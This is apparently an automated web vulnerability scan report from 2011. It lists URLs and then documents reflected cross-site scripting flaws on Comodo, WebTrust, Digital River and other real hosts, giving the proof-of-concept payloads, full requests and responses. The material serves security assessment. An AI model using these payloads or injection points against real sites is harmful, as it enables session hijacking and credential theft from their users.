18.239. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-goldsslbuynow_btn/addsupport-ssl-goldssl

18.240. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-platinumsslbuynow_btn/addsupport-ssl-platinumssl

18.241. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-platinumsslsgcbuynow_btn/addsupport-ssl-sgc

18.242. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-platinumsslsgcwilcardlbuynow_btn/addsupport-ssl-sgcwildcard

18.243. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-platinumsslwildcard_btn/addsupport-platinumssl_wildcard

18.244. http://www.enterprisessl.com/G/essl/ssl-cert-prodt-sslpage-uccbuynow_btn/sslcertificate-ucc

18.245. http://www.enterprisessl.com/images/style/splashbg.jpg

18.246. http://www.enterprisessl.com/ssl-certificate-images/sqlist.gif

18.247. http://www.enterprisessl.com/ssl-certificate-products/addsupport/ev.html

18.248. http://www.enterprisessl.com/ssl-certificate-products/addsupport/gb.html

18.249. http://www.enterprisessl.com/ssl-certificate-products/addsupport/hg.html

18.250. http://www.enterprisessl.com/ssl-certificate-products/addsupport/hp.html

18.251. http://www.enterprisessl.com/ssl-certificate-products/evssl/ssl-certificate-joi.html

18.252. http://www.pfoa.com/can-consumers-reduce-exposure-to-PFOA.html

18.253. http://www.seeos.com/

18.254. http://www.seeos.com/tg.php

18.255. http://www.trustix.com/

18.256. http://www.trustix.com/contacts/

18.257. http://www.trustix.com/corporate/

18.258. http://www.trustix.com/corporate/legal.html

18.259. http://www.trustix.com/corporate/privacy_statement.html

18.260. http://www.trustix.com/corporate/terms_of_use.html

18.261. http://www.trustix.com/free_trials/index.html

18.262. http://www.trustix.com/home/

18.263. http://www.trustix.com/index.html

18.264. http://www.trustix.com/login.html

18.265. http://www.trustix.com/medium/

18.266. http://www.trustix.com/news/index.html

18.267. http://www.trustix.com/organizations/

18.268. http://www.trustix.com/partners/index.html

18.269. http://www.trustix.com/products/content_filtering.html

18.270. http://www.trustix.com/products/remote_user.html

18.271. http://www.trustix.com/purchase/index.html

18.272. http://www.trustix.com/resellers/index.html

18.273. http://www.trustix.com/small/

18.274. http://www.trustix.com/small/index.html

18.275. http://www.trustix.com/support/index.html

18.276. http://www.vengine.com/G/comodoproducts-cdrom_index/VE-products_indexpage/getvengineoncd_btn

18.277. http://www.vengine.com/G/comodoproducts-cdromindex/VE-indexpage/getvengineoncd_btn

18.278. http://www.vengine.com/G/enterprisessl_sslpage/VE-freetools/ordersslnow_btn

18.279. http://www.vengine.com/G/venginedownload-exe/VE-products_indexpage/downloadvengineforfree_btn

18.280. http://www.vengine.com/G/vengineproducts-index/VE-indexpage/downloadnow-freeforever_btn

18.281. http://www.vengine.com/G/vengineproducts-index/VE-indexpage/downloadvengineforfree_btn

18.282. http://www.vengine.com/G/vengineproducts-tour/VE-indexpage/taketour_btn

18.283. http://www.vengine.com/G/vengineuserguide-pdf/VE-indexpage/userguidedownload_btn

18.284. http://www.vengine.com/g/Comodo-emailcertpage/VE-freetools/moreinfo_btn

18.285. http://www.vengine.com/g/HG-getfreescanlicense/VE-freetools/signupfreescanning_btn

18.286. http://www.vengine.com/g/InstantSSL-freeemailcertpage/VE-freetools/freeemailcert_btn

19. Content type incorrectly stated

19.1. http://a1.twimg.com/profile_images/527575506/faabo_01_normal.gif

19.2. http://a2.twimg.com/profile_images/1523992292/internetfirewall_normal.png

19.3. https://accounts.comodo.com/cfp/management/terms

19.4. https://cert.webtrust.org/SealFile

19.5. https://cert.webtrust.org/ViewSeal

19.6. http://depot.activalive.com/app/deployment.php

19.7. http://depot.activalive.com/favicon.ico

19.8. http://display.digitalriver.com/

19.9. http://docs.govinfosecurity.com/files/images_articles/4067_artid_4067.jpg

19.10. http://enterprise.comodo.com/internal/security-solutions/authentication-identity-assurance/two-factor/demo-form.php

19.11. http://forums.comodo.com/comodorss.php

19.12. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard

19.13. http://now.eloqua.com/visitor/v200/svrGP.aspx

19.14. http://secure.comodo.com/products/guessregion

19.15. https://secure.trustfax.com/doccorpweb/ajax/signupAjax.jsp

19.16. http://www.clicktale.com/res/2/img/button_left.png

19.17. http://www.clicktale.com/res/2/img/button_left_hover.png

19.18. http://www.clicktale.com/res/2/img/button_right.png

19.19. http://www.clicktale.com/res/2/img/button_right_hover.png

19.20. http://www.comodo.com/ttb_searcher/!ML_MANAGE

19.21. http://www.govinfosecurity.com/favicon.ico

19.22. http://www.internaldosimetry.com/images/title.gif

19.23. https://www.panopticsecurity.com/favicon.ico

19.24. http://www.parallels.com/r/css/import.css

19.25. http://www.trustfax.com/trustfax-cms-public/dms/trustfax/resources/images/TrustFax_slogan.gif

20. Content type is not specified



1. Cross-site scripting (reflected)
There are 48 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://antivirus.comodo.com/antivirus_download.php [af parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /antivirus_download.php

Issue detail

The value of the af request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a558"%20style%3dx%3aexpression(alert(1))%205e0a080bf20 was submitted in the af parameter. This input was echoed as 2a558\" style=x:expression(alert(1)) 5e0a080bf20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /antivirus_download.php?af=11652a558"%20style%3dx%3aexpression(alert(1))%205e0a080bf20 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:25 GMT
Content-Type: text/html
Connection: close
Content-Length: 21233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cav_installer_11652a558\" style=x:expression(alert(1)) 5e0a080bf20.exe"/>
...[SNIP]...

1.2. http://antivirus.comodo.com/antivirus_download.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /antivirus_download.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9a6"%20style%3dx%3aexpression(alert(1))%20e6a77e2098a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc9a6\" style=x:expression(alert(1)) e6a77e2098a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /antivirus_download.php?af=/dc9a6"%20style%3dx%3aexpression(alert(1))%20e6a77e2098a1165 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:31 GMT
Content-Type: text/html
Connection: close
Content-Length: 21235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cav_installer_/dc9a6\" style=x:expression(alert(1)) e6a77e2098a1165.exe"/>
...[SNIP]...

1.3. http://antivirus.comodo.com/cis-pro_download.php [af parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /cis-pro_download.php

Issue detail

The value of the af request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b08e"%20style%3dx%3aexpression(alert(1))%2046bb6f5d8d2 was submitted in the af parameter. This input was echoed as 2b08e\" style=x:expression(alert(1)) 46bb6f5d8d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cis-pro_download.php?af=11642b08e"%20style%3dx%3aexpression(alert(1))%2046bb6f5d8d2 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:29 GMT
Content-Type: text/html
Connection: close
Content-Length: 28859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cispro_30day_installer_11642b08e\" style=x:expression(alert(1)) 46bb6f5d8d2.exe"/>
...[SNIP]...

1.4. http://antivirus.comodo.com/cis-pro_download.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://antivirus.comodo.com
Path:   /cis-pro_download.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5250f"%20style%3dx%3aexpression(alert(1))%207056823230 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5250f\" style=x:expression(alert(1)) 7056823230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cis-pro_download.php?af=/5250f"%20style%3dx%3aexpression(alert(1))%2070568232301164 HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:04:51 GMT
Content-Type: text/html
Connection: close
Content-Length: 28859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimiz
...[SNIP]...
<meta http-equiv="Refresh" Content = "1; URL=http://download.comodo.com/cis/download/installs/1000/partners/cispro_30day_installer_/5250f\" style=x:expression(alert(1)) 70568232301164.exe"/>
...[SNIP]...

1.5. https://cert.webtrust.org/SealFile [seal parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /SealFile

Issue detail

The value of the seal request parameter is copied into the HTML document as plain text between tags. The payload bc2da<script>alert(1)</script>cd9dd7288d3 was submitted in the seal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SealFile?seal=1082bc2da<script>alert(1)</script>cd9dd7288d3&file=pdf HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://cert.webtrust.org/ViewSeal?id=1082

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 18 Sep 2011 09:40:08 GMT
Content-Type: text/html
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Length: 3699

<html><head><title>Apache Tomcat/4.0.6 - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} BODY{font-family : sans-serif,Arial,Tahoma;c
...[SNIP]...
<pre>java.lang.NumberFormatException: For input string: "1082bc2da<script>alert(1)</script>cd9dd7288d3"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.6. https://cert.webtrust.org/ViewSeal [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 54a6b<script>alert(1)</script>313790a0b05 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ViewSeal?id=108254a6b<script>alert(1)</script>313790a0b05 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.comodo.com/

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 09:40:03 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 2977

java.lang.NumberFormatException: For input string: "108254a6b<script>alert(1)</script>313790a0b05"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.7. http://depot.activalive.com/app/deployment.php [d[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://depot.activalive.com
Path:   /app/deployment.php

Issue detail

The value of the d[] request parameter is copied into the HTML document as plain text between tags. The payload c8276<script>alert(1)</script>a430c58d40f was submitted in the d[] parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app/deployment.php?id=6024&ptid=6024-1f8f8598c-d89e-453d-897a-4200ff97bc91&stid=1f8f8598c-d89e-453d-897a-4200ff97bc91&oref=http%253A%252F%252Fhome.j2.com%252Fenterprise%252Fenterprise.html&chat=null&r=0.3873252209741622&d[]=5365c8276<script>alert(1)</script>a430c58d40f&b[]=14918 HTTP/1.1
Host: depot.activalive.com
Proxy-Connection: keep-alive
Referer: http://www.fusemail.com/products/email-archiving/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Content-Length: 228
Connection: close
Content-Type: text/javascript;charset=iso-8859-1

_alc.monitoring.push(5365);
_alc.__setStartDeptStatus(5365c8276<script>alert(1)</script>a430c58d40f, false);
_alc.__setStartDeptStatus(5365, false);
_alc.monitoringOff = true;
_alc.deployment_id = 6024;
_alc.license_id = 10869;

1.8. http://display.digitalriver.com/ [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f583'-alert(1)-'56f1fd3f0b6 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=2441f583'-alert(1)-'56f1fd3f0b6&tax=par HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/products/hsphere/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:41:06 GMT
Server: Apache/2.2.9
Expires: Sun, 18 Sep 2011 12:11:06 GMT
Last-Modified: Sun, 18 Sep 2011 11:41:06 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=2441f583'-alert(1)-'56f1fd3f0b6&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.9. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a236'-alert(1)-'a4f07a80042 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=par&2a236'-alert(1)-'a4f07a80042=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/products/hsphere/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:41:07 GMT
Server: Apache/2.2.9
Expires: Sun, 18 Sep 2011 12:11:07 GMT
Last-Modified: Sun, 18 Sep 2011 11:41:07 GMT
Content-Length: 229
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par&2a236'-alert(1)-'a4f07a80042=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.10. http://display.digitalriver.com/ [tax parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ebc8'-alert(1)-'3a457381f57 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=par8ebc8'-alert(1)-'3a457381f57 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/products/hsphere/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:41:06 GMT
Server: Apache/2.2.9
Expires: Sun, 18 Sep 2011 12:11:06 GMT
Last-Modified: Sun, 18 Sep 2011 11:41:06 GMT
Content-Length: 226
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=par8ebc8'-alert(1)-'3a457381f57';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.11. http://j2global.tt.omtrdc.net/m2/j2global/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://j2global.tt.omtrdc.net
Path:   /m2/j2global/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 20938<script>alert(1)</script>a8a3b940bd4 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/j2global/mbox/standard?mboxHost=www.trustfax.com&mboxSession=1316364084200-226831&mboxPage=1316364084200-226831&screenHeight=1200&screenWidth=1920&browserWidth=1097&browserHeight=869&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=TF_xs_adClick_globalfooter20938<script>alert(1)</script>a8a3b940bd4&mboxId=0&mboxTime=1316346084298&mboxURL=http%3A%2F%2Fwww.trustfax.com%2F&mboxReferrer=http%3A%2F%2Fwww.vengine.com%2Fproducts%2Fprove_it.html&mboxVersion=39 HTTP/1.1
Host: j2global.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 222
Date: Sun, 18 Sep 2011 11:41:24 GMT
Server: Test & Target

mboxFactories.get('default').get('TF_xs_adClick_globalfooter20938<script>alert(1)</script>a8a3b940bd4',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316364084200-226831.19");

1.12. https://secure.comodo.com/home/purchase.php [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /home/purchase.php

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cb8"%20style%3dx%3aexpression(alert(1))%20f1eaf6a60d7 was submitted in the pid parameter. This input was echoed as c5cb8\" style=x:expression(alert(1)) f1eaf6a60d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /home/purchase.php?pid=9c5cb8"%20style%3dx%3aexpression(alert(1))%20f1eaf6a60d7&utm_source=pfw_fd&utm_medium=buy_free_download&af=1144&utm_campaign=PF_CIS_BUY_FD HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: http://personalfirewall.comodo.com/free-download.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; kvcd=1316328651224; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_vs=1; km_lv=1316328651; km_uq=; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1315419555.1; __utmb=1.4.10.1316328649; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 01:51:42 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 43034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="//cdn.opti
...[SNIP]...
<a href="includes/video.php?pid=9c5cb8\" style=x:expression(alert(1)) f1eaf6a60d7" id="video">
...[SNIP]...

1.13. https://secure.instantssl.com/products/SSLIdASignup1a [loginErrorMessage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/SSLIdASignup1a

Issue detail

The value of the loginErrorMessage request parameter is copied into the HTML document as plain text between tags. The payload 16f0f<script>alert(1)</script>780d4eeba57afd885 was submitted in the loginErrorMessage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /products/SSLIdASignup1a?SID=NtcydAl8wNmXs5S2&product=342&days=90&loginName=&loginPassword=&loginErrorMessage=16f0f<script>alert(1)</script>780d4eeba57afd885 HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/frontpage?area=SSL&product=342&days=90&ap=InstantSSL
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 18158

<html>
<head>
